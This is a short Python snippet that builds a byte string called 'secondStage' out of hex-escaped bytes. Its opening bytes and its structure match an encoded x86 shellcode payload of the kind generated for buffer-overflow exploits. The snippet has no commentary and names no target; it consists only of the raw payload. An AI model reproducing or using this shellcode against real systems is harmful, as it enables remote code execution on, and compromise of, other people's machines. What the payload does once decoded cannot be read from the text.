secondStage =  b""
secondStage += b"\xdb\xd5\xd9\x74\x24\xf4\xbf\x65\xfd\xe0\x04"
secondStage += b"\x58\x29\xc9\xb1\x56\x31\x78\x18\x03\x78\x18"
secondStage += b"\x83\xe8\x99\x1f\x15\xf8\x89\x62\xd6\x01\x49"
secondStage += b"\x03\x5e\xe4\x78\x03\x04\x6c\x2a\xb3\x4e\x20"
secondStage += b"\xc6\x38\x02\xd1\x5d\x4c\x8b\xd6\xd6\xfb\xed"
secondStage += b"\xd9\xe7\x50\xcd\x78\x6b\xab\x02\x5b\x52\x64"
secondStage += b"\x57\x9a\x93\x99\x9a\xce\x4c\xd5\x09\xff\xf9"
secondStage += b"\xa3\x91\x74\xb1\x22\x92\x69\x01\x44\xb3\x3f"
secondStage += b"\x1a\x1f\x13\xc1\xcf\x2b\x1a\xd9\x0c\x11\xd4"
secondStage += b"\x52\xe6\xed\xe7\xb2\x37\x0d\x4b\xfb\xf8\xfc"
secondStage += b"\x95\x3b\x3e\x1f\xe0\x35\x3d\xa2\xf3\x81\x3c"
secondStage += b"\x78\x71\x12\xe6\x0b\x21\xfe\x17\xdf\xb4\x75"
secondStage += b"\x1b\x94\xb3\xd2\x3f\x2b\x17\x69\x3b\xa0\x96"
secondStage += b"\xbe\xca\xf2\xbc\x1a\x97\xa1\xdd\x3b\x7d\x07"
secondStage += b"\xe1\x5c\xde\xf8\x47\x16\xf2\xed\xf5\x75\x9a"
secondStage += b"\xc2\x37\x86\x5a\x4d\x4f\xf5\x68\xd2\xfb\x91"
secondStage += b"\xc0\x9b\x25\x65\x51\x8b\xd5\xb9\xd9\xdc\x2b"
secondStage += b"\x3a\x19\xf4\xef\x6e\x49\x6e\xd9\x0e\x02\x6e"
secondStage += b"\xe6\xda\xbe\x64\x70\x25\x96\x03\xee\xcd\xe4"
secondStage += b"\xf3\xff\x51\x61\x15\xaf\x39\x21\x8a\x10\xea"
secondStage += b"\x81\x7a\xf9\xe0\x0e\xa4\x19\x0b\xc5\xcd\xb0"
secondStage += b"\xe4\xb3\xa6\x2c\x9c\x9e\x3d\xcc\x61\x35\x38"
secondStage += b"\xce\xea\xbf\xbc\x81\x1a\xca\xae\xf6\x7c\x34"
secondStage += b"\x2f\x07\xe9\x34\x45\x03\xbb\x63\xf1\x09\x9a"
secondStage += b"\x43\x5e\xf1\xc9\xd0\x99\x0d\x8c\xe0\xd2\x38"
secondStage += b"\x1a\x4c\x8d\x44\xca\x4c\x4d\x13\x80\x4c\x25"
secondStage += b"\xc3\xf0\x1f\x50\x0c\x2d\x0c\xc9\x99\xce\x64"
secondStage += b"\xbd\x0a\xa7\x8a\x98\x7d\x68\x75\xcf\xfd\x6f"
secondStage += b"\x89\x8d\x29\xc8\xe1\x6d\x6a\xe8\xf1\x07\x6a"
secondStage += b"\xb8\x99\xdc\x45\x37\x69\x1c\x4c\x10\xe1\x97"
secondStage += b"\x01\xd2\x90\xa8\x0b\xb2\x0c\xa8\xb8\x6f\xbf"
secondStage += b"\xd3\xb1\x90\x40\x24\xd8\xf4\x41\x24\xe4\x0a"
secondStage += b"\x7e\xf2\xdd\x78\x41\xc6\x59\x72\xf4\x6b\xcb"
secondStage += b"\x19\xf6\x38\x0b\x08"
